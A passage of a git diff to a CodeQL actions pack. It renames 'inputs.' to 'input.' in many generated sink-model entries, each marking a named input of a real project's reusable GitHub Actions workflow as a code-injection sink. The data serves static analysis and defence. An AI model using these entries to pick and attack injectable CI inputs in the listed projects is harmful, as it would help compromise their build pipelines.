@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "inputs.http-client", "code-injection", "generated"] - - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "inputs.kube-version", "code-injection", "generated"] - - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "inputs.java-version", "code-injection", "generated"] \ No newline at end of file + - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.http-client", "code-injection", "generated"] + - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.kube-version", "code-injection", "generated"] + - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml index fd4697ac1c43..19fee627702a 100644 --- a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["orange-opensource/hurl/.github/workflows/update-branch-version.yml", "*", "inputs.new_version", "code-injection", "generated"] \ No newline at end of file + - ["orange-opensource/hurl/.github/workflows/update-branch-version.yml", "*", "input.new_version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml index 90c4c20b5857..4eb201001e14 100644 --- a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["paolosalvatori/servicebusexplorer/.github/workflows/publish.yml", "*", "inputs.release-version", "code-injection", "generated"] - - ["paolosalvatori/servicebusexplorer/.github/workflows/build-test.yml", "*", "inputs.release-version", "code-injection", "generated"] \ No newline at end of file + - ["paolosalvatori/servicebusexplorer/.github/workflows/publish.yml", "*", "input.release-version", "code-injection", "generated"] + - ["paolosalvatori/servicebusexplorer/.github/workflows/build-test.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml index 51d99171a541..94c7292b655e 100644 --- a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["parcel-bundler/parcel/.github/workflows/release.yml", "*", "inputs.release-command", "code-injection", "generated"] \ No newline at end of file + - ["parcel-bundler/parcel/.github/workflows/release.yml", "*", "input.release-command", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml index 8e74c9b811d4..6088ffcd7023 100644 --- a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pardeike/harmony/.github/workflows/test-build.yml", "*", "inputs.build_configuration", "code-injection", "generated"] \ No newline at end of file + - ["pardeike/harmony/.github/workflows/test-build.yml", "*", "input.build_configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml index cd7de6d57866..05c4dc8ddf37 100644 --- a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml 
@@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.configuration", "code-injection", "generated"] - - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.platform", "code-injection", "generated"] - - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.cmakeFlags", "code-injection", "generated"] - - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] - - ["pcsx2/pcsx2/.github/workflows/macos_build.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] - - ["pcsx2/pcsx2/.github/workflows/linux_build_qt.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] - - ["pcsx2/pcsx2/.github/workflows/linux_build_flatpak.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] \ No newline at end of file + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.configuration", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.platform", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.cmakeFlags", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.patchesUrl", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/macos_build.yml", "*", "input.patchesUrl", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/linux_build_qt.yml", "*", "input.patchesUrl", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/linux_build_flatpak.yml", "*", "input.patchesUrl", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml index ecea4012c75c..affc12cdc4ad 100644 
--- a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "inputs.pytest_test_directory", "code-injection", "generated"] - - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "inputs.job_name", "code-injection", "generated"] - - ["pennylaneai/pennylane/.github/workflows/interface-unit-tests.yml", "*", "inputs.run_lightened_ci", "code-injection", "generated"] \ No newline at end of file + - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.pytest_test_directory", "code-injection", "generated"] + - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.job_name", "code-injection", "generated"] + - ["pennylaneai/pennylane/.github/workflows/interface-unit-tests.yml", "*", "input.run_lightened_ci", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml index f8ee5402a92f..b1c4d2f2cbfd 100644 --- a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pinecone-io/pinecone-python-client/.github/workflows/publish-to-pypi.yaml", "*", "inputs.prereleaseSuffix", "code-injection", "generated"] \ No newline at end of file + - ["pinecone-io/pinecone-python-client/.github/workflows/publish-to-pypi.yaml", "*", "input.prereleaseSuffix", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml index aa76014db324..4ccbd71f8c36 100644 --- a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "inputs.tags", "code-injection", "generated"] - - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "inputs.suites", "code-injection", "generated"] - - ["pixie-io/pixie/.github/workflows/get_image.yaml", "*", "inputs.image-base-name", "code-injection", "generated"] \ No newline at end of file + - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.tags", "code-injection", "generated"] + - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.suites", "code-injection", "generated"] + - ["pixie-io/pixie/.github/workflows/get_image.yaml", "*", "input.image-base-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml index e52ce3c8318f..2eb2104b542a 100644 --- a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["plantuml/plantuml/.github/workflows/native-image.yml", "*", "inputs.release-version", "code-injection", "generated"] \ No newline at end of file + - ["plantuml/plantuml/.github/workflows/native-image.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml index 31f24a27268a..fee958600308 100644 --- a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "inputs.os", "code-injection", "generated"] - - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "inputs.product", "code-injection", "generated"] - - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "inputs.is_release", "code-injection", "generated"] \ No newline at end of file + - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.os", "code-injection", "generated"] + - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.product", "code-injection", "generated"] + - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.is_release", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml index 4ace66c79c31..49a98d4dda55 100644 --- a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "inputs.benchmark", "code-injection", "generated"] - - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "inputs.trace", "code-injection", "generated"] \ No newline at end of file + - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.benchmark", "code-injection", "generated"] + - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.trace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml index 44518d6a348f..aa432107a0d1 100644 --- a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["prismlauncher/prismlauncher/.github/workflows/build.yml", "*", "inputs.build_type", "code-injection", "generated"] \ No newline at end of file + - ["prismlauncher/prismlauncher/.github/workflows/build.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml index c0edbfae484c..40053c68c1a2 100644 --- a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["product-os/flowzone/.github/workflows/flowzone.yml", "*", "inputs.ok_to_test_label", "code-injection", "generated"] \ No newline at end of file + - ["product-os/flowzone/.github/workflows/flowzone.yml", "*", "input.ok_to_test_label", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml index a28ffce30f73..645ec756783f 100644 --- a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "inputs.ent-public-key", "code-injection", "generated"] - - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "inputs.build-config-path", "code-injection", "generated"] \ No newline at end of file + - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.ent-public-key", "code-injection", "generated"] + - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.build-config-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml index afe2daa172ee..3d80594c0d5e 100644 --- a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["prql/prql/.github/workflows/test-rust.yaml", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file + - ["prql/prql/.github/workflows/test-rust.yaml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml index a07044c0ccc3..e542d409efe8 100644 --- a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "inputs.test-command", "code-injection", "generated"] - - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "inputs.test-name", "code-injection", "generated"] - - ["pulumi/pulumi/.github/workflows/ci-dev-release.yml", "*", "inputs.version", "code-injection", "generated"] - - ["pulumi/pulumi/.github/workflows/ci-build-binaries.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["pulumi/pulumi/.github/workflows/ci-build-binaries.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-command", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-name", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-dev-release.yml", "*", "input.version", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-build-binaries.yml", "*", "input.arch", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-build-binaries.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml index 250307e3acdb..5ebf7426d167 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_spec.yml", "*", "inputs.ignore_dependency_check", "code-injection", "generated"] - - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_acceptance.yml", "*", "inputs.debug", "code-injection", "generated"] - - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/matrix.yml", "*", "inputs.flags", "code-injection", "generated"] \ No newline at end of file + - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_spec.yml", "*", "input.ignore_dependency_check", "code-injection", "generated"] + - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_acceptance.yml", "*", "input.debug", "code-injection", "generated"] + - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/matrix.yml", "*", "input.flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml index e968f2097065..c5630248f7f9 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml 
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["pyo3/maturin/.github/workflows/downstream.yml", "*", "inputs.manifest-dir", "code-injection", "generated"]
\ No newline at end of file
+ - ["pyo3/maturin/.github/workflows/downstream.yml", "*", "input.manifest-dir", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml
index 438f637a9a09..4ea93f374b3c 100644
--- a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["pyo3/pyo3/.github/workflows/build.yml", "*", "inputs.extra-features", "code-injection", "generated"]
\ No newline at end of file
+ - ["pyo3/pyo3/.github/workflows/build.yml", "*", "input.extra-features", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml
index 7e7b82b25f52..d702e7ad830a 100644
--- a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["python/cpython/.github/workflows/reusable-ubuntu.yml", "*", "inputs.options", "code-injection", "generated"]
- - ["python/cpython/.github/workflows/reusable-tsan.yml", "*", "inputs.options", "code-injection", "generated"]
\ No newline at end of file
+ - ["python/cpython/.github/workflows/reusable-ubuntu.yml", "*", "input.options", "code-injection", "generated"]
+ - ["python/cpython/.github/workflows/reusable-tsan.yml", "*", "input.options", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml
index e3c3b19e4413..baba2fc1e150 100644
--- a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["pytorch/botorch/.github/workflows/reusable_website.yml", "*", "inputs.release_tag", "code-injection", "generated"]
\ No newline at end of file
+ - ["pytorch/botorch/.github/workflows/reusable_website.yml", "*", "input.release_tag", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml
index 704adb3f121b..feb68c4bdd74 100644
--- a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["pytorch/xla/.github/workflows/_test.yml", "*", "inputs.test-script", "code-injection", "generated"]
\ No newline at end of file
+ - ["pytorch/xla/.github/workflows/_test.yml", "*", "input.test-script", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml
index 5300a7d145e1..d3b779c1afa2 100644
--- a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["quarto-dev/quarto-cli/.github/workflows/test-smokes.yml", "*", "inputs.buckets", "code-injection", "generated"]
\ No newline at end of file
+ - ["quarto-dev/quarto-cli/.github/workflows/test-smokes.yml", "*", "input.buckets", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml
index f82254bd22b6..6b0e733be176 100644
--- a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "inputs.tagged_release", "code-injection", "generated"]
- - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "inputs.target_branch", "code-injection", "generated"]
- - ["rancher/dashboard/.github/workflows/build-extension-catalog.yml", "*", "inputs.tagged_release", "code-injection", "generated"]
- - ["rancher/dashboard/.github/workflows/build-extension-catalog.yml", "*", "inputs.registry_target", "code-injection", "generated"]
\ No newline at end of file
+ - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.tagged_release", "code-injection", "generated"]
+ - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.target_branch", "code-injection", "generated"]
+ - ["rancher/dashboard/.github/workflows/build-extension-catalog.yml", "*", "input.tagged_release", "code-injection", "generated"]
+ - ["rancher/dashboard/.github/workflows/build-extension-catalog.yml", "*", "input.registry_target", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml
index 80a26a9e65fb..cf9971e85246 100644
--- a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["rasterio/rasterio/.github/workflows/test_gdal_build.yaml", "*", "inputs.gdal_ref", "code-injection", "generated"]
\ No newline at end of file
+ - ["rasterio/rasterio/.github/workflows/test_gdal_build.yaml", "*", "input.gdal_ref", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml
index eb5e7835565f..b3518a7a8eed 100644
--- a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["redisearch/redisearch/.github/workflows/flow-build-artifacts.yml", "*", "inputs.architecture", "code-injection", "generated"]
\ No newline at end of file
+ - ["redisearch/redisearch/.github/workflows/flow-build-artifacts.yml", "*", "input.architecture", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml
index cd2629f49bcf..a60fba237ef1 100644
--- a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["remix-run/remix/.github/workflows/stacks.yml", "*", "inputs.version", "code-injection", "generated"]
\ No newline at end of file
+ - ["remix-run/remix/.github/workflows/stacks.yml", "*", "input.version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml
index 77ad5d6a6d35..37f2febb70f3 100644
--- a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["rmcrackan/libation/.github/workflows/build-windows.yml", "*", "inputs.version_override", "code-injection", "generated"]
- - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "inputs.architecture", "code-injection", "generated"]
- - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "inputs.OS", "code-injection", "generated"]
- - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "inputs.version_override", "code-injection", "generated"]
\ No newline at end of file
+ - ["rmcrackan/libation/.github/workflows/build-windows.yml", "*", "input.version_override", "code-injection", "generated"]
+ - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "input.architecture", "code-injection", "generated"]
+ - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "input.OS", "code-injection", "generated"]
+ - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "input.version_override", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml
index a881a1a5fd3e..6e3d48dbf89c 100644
--- a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["rocketchat/rocket.chat/.github/workflows/ci-test-e2e.yml", "*", "inputs.total-shard", "code-injection", "generated"]
\ No newline at end of file
+ - ["rocketchat/rocket.chat/.github/workflows/ci-test-e2e.yml", "*", "input.total-shard", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml
index 693d3abc03e1..465fff41145d 100644
--- a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["ruby/ruby.wasm/.github/workflows/build.yml", "*", "inputs.prerel_name", "code-injection", "generated"]
\ No newline at end of file
+ - ["ruby/ruby.wasm/.github/workflows/build.yml", "*", "input.prerel_name", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml
index 119cbe465e6a..3f091f1c9613 100644
--- a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "inputs.target_version", "code-injection", "generated"]
- - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "inputs.configuration", "code-injection", "generated"]
- - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "inputs.platform", "code-injection", "generated"]
\ No newline at end of file
+ - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.target_version", "code-injection", "generated"]
+ - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.configuration", "code-injection", "generated"]
+ - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.platform", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml
index 2d35b933923f..efa591f749dd 100644
